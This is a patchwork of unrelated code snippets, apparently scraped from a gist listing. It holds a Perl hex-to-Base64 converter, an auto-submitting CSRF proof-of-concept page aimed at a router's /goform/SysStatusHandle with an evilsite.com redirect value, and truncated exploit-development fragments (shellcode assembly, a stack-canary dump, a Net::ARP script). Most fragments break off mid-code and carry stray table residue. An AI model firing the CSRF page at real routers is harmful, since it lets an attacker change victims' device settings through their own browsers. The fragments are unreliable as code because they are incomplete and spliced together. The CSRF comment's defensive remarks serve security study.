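#!/bin/env perl
# Convert hex-encoded lines (one value per line, read from STDIN or from the
# files named on the command line) to standard Base64, one output line per
# input line.
#
# The conversion reuses pack('u', ...): uuencode and Base64 both split the
# input into 6-bit groups and differ only in the alphabet and in the length
# character that uuencode puts at the start of every line.
use strict;
use warnings;

while (my $hex = <>) {
    chomp $hex;

    # pack('H*') is lenient: an odd number of digits is padded with a zero
    # nibble and non-hex characters are not rejected, so feed it clean hex.
    my $raw = pack('H*', $hex);

    my $b64 = pack('u', $raw);
    # Drop the length character that starts each uuencoded line, and the
    # line breaks themselves.
    $b64 =~ s/(^.|[\n\r])//mg;
    # Map the uuencode alphabet (backtick or space = 0, then '!'..'_') onto
    # the Base64 alphabet.
    $b64 =~ tr#` -_#AA-Za-z0-9+/#;

    # uuencode fills an incomplete final 3-byte group with zero bytes, which
    # come out as trailing 'A's. Base64 marks those positions with '=';
    # without this step the output decodes with extra NUL bytes appended.
    my $pad = (3 - length($raw) % 3) % 3;
    substr($b64, -$pad) = '=' x $pad if $pad;

    print $b64, $/;
}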
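<!--
  CSRF proof of concept for a router web interface at 192.168.0.1.
  On load, the page posts the hidden fields below to /goform/SysStatusHandle
  from the visitor's browser, so the request rides on whatever session or
  credentials the browser already holds for the router. None of the fields
  is an anti-CSRF token; if the router accepts the request as-is, the handler
  is not verifying that the request came from its own pages.
  Defensive notes: a state-changing handler like this should require an
  unpredictable per-session token, check the Origin/Referer header, and
  validate the GO value against an allow-list (presumably GO is a
  post-action redirect target; confirm against the firmware).
-->
<body onload='document.forms[0].submit()'>
<form action='http://192.168.0.1/goform/SysStatusHandle' method='post'>
<input type="hidden" name="CMD" value="WAN_CON" />
<input type="hidden" name="GO" value="http://evilsite.com" />
<input type="hidden" name="action" value='2' />
</form>
</body>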
// gcc -c yes.S -o yes.o && gcc yes.o -o yes | |
.file "yes.S" | |
.data | |
y: .string "y" | |
.text | |
.globl main | |
main: | |
cmpq $2, %rdi | |
jl .L1 |
.section .text | |
.global _start | |
_start: | |
pushq %rbp | |
movq %rsp, %rbp | |
subq $13, %rsp | |
shellcode: | |
movb $0x05, -1(%rbp) | |
movb $0x0f, -2(%rbp) | |
movb $0xc7, -3(%rbp) |
#!/usr/bin/perl -w | |
use strict; | |
use warnings; | |
my $bin = $ARGV[0]; | |
my $func= $ARGV[1]; | |
die("./$0 <binary> <function>") if (!defined $bin or !defined $func); | |
my @shellcode; |
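# exit(1) on x86-64 Linux. Registers are cleared with xor and the small
# constants are loaded through 8-bit sub-registers instead of 64-bit
# immediates, so the encoded instructions contain no zero bytes.
_start:
    xorq %rax, %rax      # rax = 0
    movb $0x3c, %al      # rax = 60, the x86-64 Linux exit syscall number
    xorq %rdi, %rdi      # rdi = 0
    incb %dil            # rdi = 1, the exit status
    syscall              # exit(1); does not return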
(gdb) disas main | |
Dump of assembler code for function main: | |
0x00000000004005ab <+0>: sub $0x18,%rsp | |
0x00000000004005af <+4>: mov %fs:0x28,%rax | |
0x00000000004005b8 <+13>: mov %rax,0x8(%rsp) | |
0x00000000004005bd <+18>: xor %eax,%eax | |
0x00000000004005bf <+20>: callq 0x400566 <get_canary> | |
0x00000000004005c4 <+25>: mov (%rax),%rsi | |
0x00000000004005c7 <+28>: mov $0x400688,%edi | |
0x00000000004005cc <+33>: mov $0x0,%eax |
// gcc -O1 -fstack-protector-all -o main main.c | |
#include <stdio.h> | |
#include <linux/types.h> | |
#ifndef uint64_t | |
typedef unsigned long uint64_t; | |
#endif | |
uint64_t get_canary() { | |
uint64_t a; |
#!/usr/bin/perl -w | |
use strict; | |
use warnings; | |
use Net::ARP; | |
my $source = "10.0.2.15"; | |
my $dev = "enp0s3"; | |
WHILE: print "\$ "; |
// gcc -o get_orig_hwaddr get_orig_hwaddr.c | |
#include <stdio.h> | |
#include <errno.h> | |
#include <string.h> | |
#include <net/if.h> | |
#include <sys/ioctl.h> | |
#include <sys/socket.h> | |
char *get_addr (int fd, struct ifreq *ifrq) { |